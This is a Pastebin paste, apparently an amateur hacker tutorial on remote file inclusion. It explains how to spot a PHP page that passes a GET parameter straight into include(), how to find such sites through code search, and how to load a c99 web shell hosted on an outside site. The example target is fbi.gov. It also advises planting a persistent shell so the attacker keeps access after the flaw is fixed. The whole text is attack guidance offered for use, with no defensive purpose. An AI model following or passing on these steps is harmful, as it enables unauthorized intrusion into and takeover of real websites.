Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ok so remote file inclusion is including a file from your site on another site/server
- normally people will include a c99 shell and there is 1 here http://www.evilc0der.com/c99.txt
- so then all you have to do is find a site
- so lets say we have a site
- http://www.fbi.gov/index.php?page=blog.php
- ok so to find if it's vulnerable goto index.php and view the source
- newbies "right click-->view page source"
- if the inclusion code is something like :
- Code:
- <?php
- $page = $_GET['page'];
- include($page);
- ?>
- then it's possible to include our file on there site
- finding vuln sites is easier than ever now that google code search is out
- http://www.google.com/codesearch
- so lets say the http://www.fbi.gov/index.php has that code in it
- now we try this
- http://www.fbi.gov/index.php?page=http:/...om/c99.txt
- you see this will show your c99 shell on there site
- so when it had the include function for blog.php it was including that page in that site.
- a common flaw seeming that people use it so much bcoz of it's simplicity
- now this should work
- but if it shows shell in it's origional text form
- then
- but dont try a .php shell on there
- coz you see
- if you upload the shell to your account on lets say spam.com
- and save it as .php
- whn you include the shell it will show the shell on your site
- so you will just be defacing your t35 account from a different site
- so it has to be in .txt form
- if it shows the shell i reccomend uploading a shell from the included shell
- bcoz it makes it much easier to manage
- also you can go back to the shell if they fix the bugs
- happy hacking
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
